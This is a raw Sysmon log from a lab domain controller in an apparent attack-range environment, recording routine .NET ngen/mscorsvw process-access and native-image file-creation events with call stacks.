13:25:46.150{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465A-6000-1804-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.072{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465A-6000-1704-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.056{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465A-6000-1704-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.056{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465A-6000-1704-000000009A01}4500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:46.009{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465A-6000-1604-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.994{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465A-6000-1604-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.994{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465A-6000-1604-000000009A01}3304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.994{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465B-6000-2104-000000009A01}4704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.994{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465B-6000-2104-000000009A01}4704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.916{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465B-6000-2004-000000009A01}4668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.900{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465B-6000-2004-000000009A01}4668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.900{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465B-6000-2004-000000009A01}4668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:47.838{08A6967A-465B-6000-1F04-000000009A01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1108-0\PresentationFramework-SystemData.dll2021-01-14 13:25:47.838 10341000x80000000000000008247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.775{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465B-6000-1F04-000000009A01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.759{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465B-6000-1F04-000000009A01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.759{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465B-6000-1F04-000000009A01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.712{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465B-6000-1E04-000000009A01}2696C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.697{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-465B-6000-1E04-000000009A01}2696C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.697{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465B-6000-1E04-000000009A01}2696C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:47.650{08A6967A-465B-6000-1D04-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bdc-0\PresentationFramework-SystemCore.dll2021-01-14 13:25:47.650 10341000x80000000000000008240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.525{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465B-6000-1D04-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.509{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-465B-6000-1D04-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.509{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465B-6000-1D04-000000009A01}3036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.150{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465B-6000-1C04-000000009A01}4964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:47.134{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465B-6000-1C04-000000009A01}4964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 